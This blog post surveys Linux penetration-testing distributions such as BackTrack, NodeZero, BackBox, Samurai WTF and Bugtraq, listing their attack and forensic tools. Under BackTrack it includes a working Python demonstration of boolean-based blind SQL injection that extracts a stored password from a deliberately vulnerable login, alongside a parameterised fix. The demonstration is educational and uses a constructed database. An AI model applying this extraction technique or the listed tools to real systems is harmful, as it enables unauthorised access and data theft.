
Update May 2013: We have updated this post! Please click here to see the latest news, RSS feeds, videos, specs and reviews of the world's most widely used and popular Linux penetration testing distributions. Click on the distro name to jump straight to its specific page: Kali Linux, Knoppix STD, BackBox, Pentoo, DEFT, CAINE, Samurai WTF, Matriux Krypton, WEAKERTH4N, Bugtraq and NodeZero
Update May 2013: Related Post: Poll! Which is the best Linux Hacking Distro? Cast your vote!
Update March 2013: BackTrack has evolved into Kali Linux. Our blog post on this was mentioned on the PaulDotCom information security web show; read our Kali Linux Family Tree post and learn about the history and origin of this latest version of BackTrack. Kali Linux is the sixth pentesting distro from Offensive Security (the guys behind BackTrack).
Update February 2013: Owing to some great comments below we edited this post so it has now become the “12 Best Linux Penetration Distro List!”
OK, none of the following pentesting distributions were in the top 100 list over at DistroWatch, but we don't care: we are talking about penetration testing tools, or specifically the creation of distros that bundle all the necessary open source tools that help ethical hackers and penetration testers do their job. Like everything else when it comes to choices, every pentesting distro has its own pros, cons and specialty. Some distros, for example, are better at web application vulnerability discovery, forensics, WiFi cracking, reverse engineering, malware analysis, social engineering etc.
1. BackTrack 5r3

The mother, or at least the best known, of Linux pentesting distros. BackTrack has a very cool strapline: “The quieter you become, the more you are able to hear.” That just sounds cool….
BackTrack is based on the ever-popular Ubuntu. The pentesting distro used to be available only with a KDE environment, but GNOME was added as an option with the release of BackTrack v5. For those working in information security or intrusion detection, BackTrack is one of the most popular pentesting distros that can run from a live CD or flash drive. The distribution is ideal for wireless cracking, exploiting, web application assessment, learning, or social-engineering a client.
Here is a list of some of the awesome tools available in BackTrack 5r3 (the latest release).
To identify Live Hosts:
dnmap – Distributed NMap
address6 – IPv6 address conversion tool (part of the THC-IPv6 toolkit)
Information Gathering Analysis (Social Engineering)
Jigsaw – Grabs information about company employees
Uberharvest – Email harvester
sslcaudit – SSL Cert audit
VoIP honey – VoIP Honeypot
urlcrazy – Detects URL typos used in typo squatting, url hijacking, phishing
Web Crawlers
Apache_users – Apache username enumerator
Deblaze – Performs enumeration and interrogation against Flash remote end points
Database Analysis
tnscmd10g – Sends raw commands to the Oracle TNS listener for enumeration
BBQSQL – Blind SQL injection toolkit
* If you are interested in Database Security see our Hacker Halted summary here.
Bluetooth Analysis
Blueranger – Uses link quality to locate Bluetooth devices
Vulnerability Assessment
Lynis – Scans systems & software for security issues
DotDotPwn – Directory Traversal fuzzer
Exploitation Tools
netgear-telnetenable – Enables the Telnet console on Netgear devices
Termineter – Smart meter testing framework
Htexploit – Tool to bypass standard directory protection
Jboss-Autopwn – Deploys JSP shell on target JBoss servers
Websploit – Scans & analyses remote systems for vulnerabilities
Wireless Exploitation Tools
Bluepot – Bluetooth honeypot
Spooftooph – Spoofs or clones Bluetooth devices
Smartphone-Pentest-Framework
Fern-Wifi-cracker – GUI for testing wireless encryption strength
wifihoney – Creates fake APs using all encryption types and monitors them with Airodump
Wifite – Automated wireless auditor
Password Tools
Creddump
Johnny
Manglefizz
Ophcrack
Phrasendresher
Rainbowcrack
Acccheck
smbexec
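Most of the entries above are just names, so here is one of the techniques made concrete. BBQSQL automates blind SQL injection; the example below is an added illustration written for this post, not code from BBQSQL or from BackTrack. It builds a constructed in-memory SQLite database with a login check that concatenates user input into SQL. The attacker only ever sees whether the query matched a row (one bit per request), yet recovers the stored password hash character by character, using binary search over code points so each character costs about seven requests instead of up to 128. The parameterised query at the end shows why the identical payloads get nowhere against correctly written code. Every table, column, function name and value here is made up for the demo.

```python
"""Boolean-based blind SQL injection against an in-memory SQLite database.

Added example (not BBQSQL's or BackTrack's own code). The table, the
secret and all function names are constructed for the demonstration.
"""
import sqlite3

SECRET = "s3cr3t_hash_value"  # constructed value the attacker will recover


def make_db():
    """Constructed sample database: one user row holding the secret."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
    conn.commit()
    return conn


def vulnerable_login(conn, username):
    """Vulnerable: untrusted input is concatenated into the SQL string.

    The caller learns only whether a row matched (True/False), never any
    column data. That single bit per request is what 'blind' means.
    """
    sql = "SELECT 1 FROM users WHERE username = '%s'" % username
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a syntax error also reads as 'no match'


def safe_login(conn, username):
    """Hardened: a parameterised query. The payload is compared as a literal
    username, so the injected condition is never evaluated."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row is not None


def ask(login, condition):
    """Turn a yes/no question about the admin row into a login attempt.

    The injected SQL becomes:
      ... WHERE username = 'admin' AND (<condition>) -- '
    The trailing '--' comments out the original closing quote.
    """
    return login("admin' AND (%s) -- " % condition)


def binary_search(login, predicate, lo, hi):
    """Find the smallest n in [lo, hi] for which '<expr> > n' is false,
    i.e. the exact value of <expr>, in about log2(hi - lo) oracle queries.
    'predicate' is a format string with one %d slot for n."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(login, predicate % mid):
            lo = mid + 1  # value > mid
        else:
            hi = mid      # value <= mid
    return lo


def extract_secret(login, max_len=64):
    """Recover the admin password using only True/False answers."""
    # 1. Length of the secret (assumed at most max_len characters).
    length = binary_search(login, "length(password) > %d", 0, max_len)
    # 2. Each character: binary search over its code point (ASCII assumed).
    chars = []
    for pos in range(1, length + 1):
        cp = binary_search(
            login, "unicode(substr(password,%d,1)) > %%d" % pos, 0, 127
        )
        chars.append(chr(cp))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    # The vulnerable endpoint leaks the whole secret ...
    leaked = extract_secret(lambda user: vulnerable_login(db, user))
    print("recovered via vulnerable_login:", repr(leaked))
    # ... while the parameterised one answers 'no' to every probe.
    nothing = extract_secret(lambda user: safe_login(db, user))
    print("recovered via safe_login:", repr(nothing))
```

Running the file prints the recovered secret for the concatenated query and an empty string for the parameterised one: against `safe_login` every probe is a failed login, so the length search converges on zero and no characters are requested. The same loop structure is what a tool like BBQSQL applies over HTTP, with the True/False oracle derived from a response difference (status code, body length, or a timing delay) instead of a function return value.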
2. NodeZero.
Like BackTrack, NodeZero is an Ubuntu-based distro used for penetration testing. It uses the Ubuntu repositories, so every time Ubuntu releases a patch for its bugs you are also notified of system updates or upgrades. NodeZero used to be famous for its inclusion of the THC IPv6 Attack Toolkit, which includes tools like alive6, detect-new-ip6, dnsdict6, etc., but I think that these days BackTrack 5r3 also includes these tools.
Whereas BackTrack is touted as being a “run-everywhere” distro, i.e. running it live, NodeZero Linux (which can also be run live) states that the distro's real strength comes from a hard install. NodeZero, in their own words, believe that a penetration tester “requires a strong and efficient system [achieved by using] a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable Linux environment.” Sounds cool. Ever tried it? Let us know in the comments below.
3. BackBox Linux
BackBox is getting more popular by the day. Like BackTrack and NodeZero, BackBox Linux is an Ubuntu-based distribution developed to perform penetration tests and security assessments. The developers state that the intention with BackBox is to create a pentesting distro that is fast and easy to use. BackBox does have a pretty concise-looking desktop environment and seems to work very well. Like the other distros, BackBox is always updated to the latest stable versions of the most often used and best-known ethical hacking tools through its repositories.
BackBox has all the usual suspects for forensic analysis, documentation & reporting and reverse engineering, with tools like ettercap, john, metasploit, nmap, Social Engineering Toolkit, sleuthkit, w3af, wireshark, etc.
4. Blackbuntu.
Yes, as the name clearly suggests, this is yet another distro that is based on Ubuntu. Here is a list of the security and penetration testing tool categories available within the Blackbuntu package (each category has many sub-categories), which gives you a general idea of what comes with this pentesting distro: Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital Forensics, Reverse Engineering and a Miscellaneous section. This list is hardly revolutionary, but the tools contained within might be different to the other distros.
5. Samurai Web Testing Framework.
This is a live Linux distro that has been pre-configured with some of the best open source and free tools that focus on testing and attacking websites. (The difference with the Samurai Web Testing Framework is that it focuses on attacking, and therefore being able to defend, websites.) The developers outline four steps of a web pen-test. These steps are incorporated within the distro, which contains the necessary tools to complete each task.
Step 1: Reconnaissance – Tools include Fierce domain scanner and Maltego.
Step 2: Mapping – Tools include WebScarab and ratproxy.
Step 3: Discovery – Tools include w3af and burp.
Step 4: Exploitation – Tools include BeEF, AJAXShell and much more.
Of interest as well, the Live CD also includes a pre-configured wiki, set up to be a central information store during your pen-test.
The Samurai Web Testing Framework is a live Linux distro that focuses on web application vulnerability research and web pentesting within a “safe environment”, i.e. so you can ethically hack without violating any laws. This is a pentesting distro recommended for penetration testers who want to combine network and web app techniques.
6. Knoppix STD.
This distro is based on Debian and originated in Germany. The architecture is i486 and it runs with the following desktops: GNOME, KDE, LXDE and also Openbox. Knoppix has been around for a long time now; in fact I think it was one of the original live distros.
Knoppix is primarily designed to be used as a live CD, but it can also be installed on a hard disk. The STD in the Knoppix STD name stands for Security Tools Distribution. The cryptography section is particularly well known in Knoppix STD.
7. Pentoo.
Pentoo is a security-focused live CD based on Gentoo. In their own words, “Pentoo is Gentoo with the pentoo overlay.” So, if you are into Gentoo then this is the distro for you. Their homepage lists some of their customized tools and kernel, including: a hardened kernel with aufs patches, a backported WiFi stack from the latest stable kernel release, module loading support à la Slax, the XFCE4 window manager and CUDA/OpenCL cracking support with development tools.
8. WEAKERTH4N.
This penetration distribution is built from Debian Squeeze and uses Fluxbox for its desktop environment. This pentesting distro is particularly well adjusted for WiFi hacking since it contains many wireless tools. Here is a quick summary of WEAKERTH4N's tool categories: WiFi attacks, SQL hacking, Cisco exploitation, password cracking, web hacking, Bluetooth, VoIP hacking, social engineering, information gathering, fuzzing, Android hacking, networking and shells.
9. Matriux Krypton.
This Linux distro is, I believe, the first security distribution based directly on Debian (after WEAKERTH4N?); if I am wrong please comment below! There are 300 security tools, organised into what Matriux calls “arsenals”. The arsenals allow for penetration testing, ethical hacking, system and network administration, security testing, vulnerability analysis, cyber forensics investigations, exploiting, cracking and data recovery. The last category, data recovery, doesn't seem to be prevalent in the other distros.
10. DEFT.
The latest version is DEFT 7, which is based on the new Linux kernel 3 and the DART (Digital Advanced Response Toolkit). This distro is more orientated towards computer forensics and uses LXDE as its desktop environment and WINE for executing Windows tools under Linux. The developers (based in Italy) hope that their distro will be used by the military, police, investigators, IT auditors and professional penetration testers. DEFT is an abbreviation for “Digital Evidence & Forensic Toolkit”.
11. CAINE
A reader of our blog suggested adding CAINE, which we duly have. CAINE stands for Computer Aided INvestigative Environment and, like many information security products and tools, it is an Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic environment that is organized to integrate existing software tools, composed as software modules, all displayed within a friendly graphical interface. CAINE states three objectives: to ensure that the distro works in an interoperable environment that supports the digital investigator during the four phases of the digital investigation; to provide a user-friendly graphical interface; and to provide a semi-automated compilation of the final forensic report. As you would likely expect, CAINE is fully open source.
If anyone has used this please let us know.
12. Bugtraq
Bugtraq is another reader-submitted pentesting distro. Based on the 2.6.38 kernel, this distro offers a really wide range of penetration and forensic tools. Like most of the others in this list, Bugtraq can be hard-installed or, obviously, run as a live DVD or from a USB drive. Bugtraq claims to have recently configured and updated the kernel for better performance, but also, importantly, so that it can recognize more hardware, including wireless injection patches for pentesting. The team at Bugtraq seem solid because they are clearly making an effort to get the kernel to work with more hardware, something on which the other distributions don't always place enough importance.
Some of the special features included with Bugtraq (as stated) are an expanded range of recognised wireless injection drivers (i.e. not just the usual Alfa rtl8187), a patched 2.6.38 kernel and a solid installation of the usual suspects: Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira etc.
Unique to Bugtraq (as claimed on their site) is the ability, or better said the ease, of deleting tracks and backdoors. Just from having read about Bugtraq I'm really glad that I can add this to the list, because it just sounds like a job well done. If you are interested in any of the following pentesting and forensic categories, then do go and check out Bugtraq: Malware, Penetration Shield, Web audit, Brute force attack, Communication and Forensics Analytics, Sniffers, Virtualizations, Anonymity and Tracking, Mapping and Vulnerability detection.
Quick Summary: You can't go wrong with any Ubuntu-based distro. BackTrack does the job well but I guess, of course, it's all personal, i.e. does the distro do the job for you? Every penetration tester leans towards a particular tool or tool-set. Frankly they are all good, and it would be prudent to use several of these pentesting distros as live versions. For WiFi hacking WEAKERTH4N is likely your better friend, whilst to stay within the law, use Samurai.
Bugtraq looks really good – the team behind it seems to have taken considerable time to tick all the boxes. Once we test it I’ll update the post.
Here is a list of other distros (which we think are still alive and kicking – please correct us if we are wrong).
Other Distros
Damn Vulnerable Linux (reader comment: more of an operating system for attacking purposes)
Hakin9 (an educational and training distro that you can use to play along with when subscribing to the hacking magazine Hakin9)
Helix
nUbuntu
Network Security Toolkit (NST)
OWASP Labrat
Frenzy
grml
Ophcrack
FCCU
OSWA Assistant
Russix
Chaox-NG
GnackTrack
Katana
Securix-NSM
Auditor
And here is a list of distros that, regrettably, have passed on to Linux Heaven.
KCPentrix
Protech
FIRE
Arudius
INSERT
Local Area Security (LAS)
NavynOS
Operator
PHLAK
PLAC
SENTINIX
Talos
ThePacketMaster
Trinux
WarLinux
Whoppix
WHAX
HeX
Stagos FSE
SNARL